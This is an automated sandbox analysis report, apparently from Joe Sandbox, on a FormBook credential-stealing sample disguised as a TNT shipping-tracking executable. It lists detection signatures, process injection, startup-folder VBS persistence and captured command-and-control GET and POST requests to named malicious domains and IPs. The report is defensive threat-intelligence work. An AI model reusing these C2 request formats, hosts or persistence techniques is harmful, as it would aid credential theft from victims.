Windows Analysis Report
TNT AWB TRACKING DETAILS.exe

Overview

General Information

Sample name: TNT AWB TRACKING DETAILS.exe
Analysis ID: 1576937
MD5: c32b24d16816af9addd23883f8b474bb
SHA1: 17e0ef8034418ee6bf28e6436a95e5c16a4f2b2e
SHA256: de25835c72e839f3e2ef5636b3a144a584a4a5f9aec9bfacf474a9740ea135dd
Tags: exe user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • TNT AWB TRACKING DETAILS.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: C32B24D16816AF9ADDD23883F8B474BB)
    • jailkeeper.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: C32B24D16816AF9ADDD23883F8B474BB)
      • svchost.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • bRQIkEscRm.exe (PID: 2248 cmdline: "C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • mobsync.exe (PID: 5236 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
            • firefox.exe (PID: 6336 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 6536 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • jailkeeper.exe (PID: 4372 cmdline: "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" MD5: C32B24D16816AF9ADDD23883F8B474BB)
      • svchost.exe (PID: 5764 cmdline: "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
No configs have been found
Yara matches (memory dumps):

Source | Rule | Description | Author | Strings
0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Yara matches (unpacked PEs):

Source | Rule | Description | Author | Strings
3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs", ProcessId: 6536, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ParentProcessId: 6140, ParentProcessName: jailkeeper.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 2404, ProcessName: svchost.exe
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs", ProcessId: 6536, ProcessName: wscript.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ParentProcessId: 6140, ParentProcessName: jailkeeper.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 2404, ProcessName: svchost.exe

Data Obfuscation

Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ProcessId: 6140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T18:39:08.495731+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49841 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:34.352227+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49902 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:57.628568+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49959 | 8.217.17.192 | 80 | TCP

Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T18:39:25.345565+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49880 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:28.014150+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49886 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:30.768674+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49895 | 3.33.130.190 | 80 | TCP
2024-12-17T18:39:49.598024+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49938 | 8.217.17.192 | 80 | TCP
2024-12-17T18:39:52.254372+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49944 | 8.217.17.192 | 80 | TCP
2024-12-17T18:39:54.910475+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49951 | 8.217.17.192 | 80 | TCP
2024-12-17T18:40:04.454686+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49976 | 209.74.64.189 | 80 | TCP

AV Detection

Source: http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ReversingLabs: Detection: 57%
Source: TNT AWB TRACKING DETAILS.exe, ReversingLabs: Detection: 57%
Source: Yara match, File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Joe Sandbox ML: detected
Source: TNT AWB TRACKING DETAILS.exe, Joe Sandbox ML: detected
Source: TNT AWB TRACKING DETAILS.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bRQIkEscRm.exe, 00000009.00000002.3366053235.00000000007CE000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mobsync.pdb source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F2445A
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2C6D1 FindFirstFileW,FindClose,0_2_00F2C6D1
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2C75C
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2EF95
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2F0F2
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2F3F3
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F237EF
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F23B12
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2BCBC
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0022445A
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022C6D1 FindFirstFileW,FindClose,2_2_0022C6D1
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0022C75C
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022EF95
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022F0F2
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022F3F3
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_002237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_002237EF
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_00223B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00223B12
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, Code function: 2_2_0022BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022BCBC

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49880 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49841 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49902 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49886 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49895 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49938 -> 8.217.17.192:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49944 -> 8.217.17.192:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49951 -> 8.217.17.192:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49976 -> 209.74.64.189:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49959 -> 8.217.17.192:80
Source: DNS query: www.medicaresbasics.xyz
Source: Joe Sandbox View, IP Address: 209.74.64.189
Source: Joe Sandbox View, IP Address: 3.33.130.190
Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View, ASN Name: AMAZONEXPANSIONGB
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00F322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F322EE
Source: global traffic, HTTP traffic detected:
GET /0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs HTTP/1.1
Host: www.arcare.partners
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)

Source: global traffic, HTTP traffic detected:
GET /fm31/?RDupG=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&wdw=m8AHs HTTP/1.1
Host: www.medicaresbasics.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)

Source: global traffic, HTTP traffic detected:
GET /ir1u/?RDupG=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX86+yEJ2aXOXj0apRFi4P0I8PrRUWlOvP3kyATHOLhpgDgxP6JOJQ=&wdw=m8AHs HTTP/1.1
Host: www.meliorahomes.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Source: global traffic, DNS traffic detected: DNS query: www.arcare.partners
Source: global traffic, DNS traffic detected: DNS query: www.medicaresbasics.xyz
Source: global traffic, DNS traffic detected: DNS query: www.resellnexa.shop
Source: global traffic, DNS traffic detected: DNS query: www.meliorahomes.net
Source: global traffic, DNS traffic detected: DNS query: www.martmall.info
Source: unknown, HTTP traffic detected:
POST /fm31/ HTTP/1.1
Host: www.medicaresbasics.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.medicaresbasics.xyz
Referer: http://www.medicaresbasics.xyz/fm31/
Cache-Control: no-cache
Content-Length: 210
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Data Ascii: RDupG=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX/e8j7LAZqGYue//mPXqHq8HuMWsCi3coQ3AJiRB8AsX
Source: global traffic, HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Tue, 17 Dec 2024 17:39:49 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.34
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Source: global traffic, HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Tue, 17 Dec 2024 17:39:52 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.34
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Source: global traffic, HTTP traffic detected:
HTTP/1.1 404 Not Found
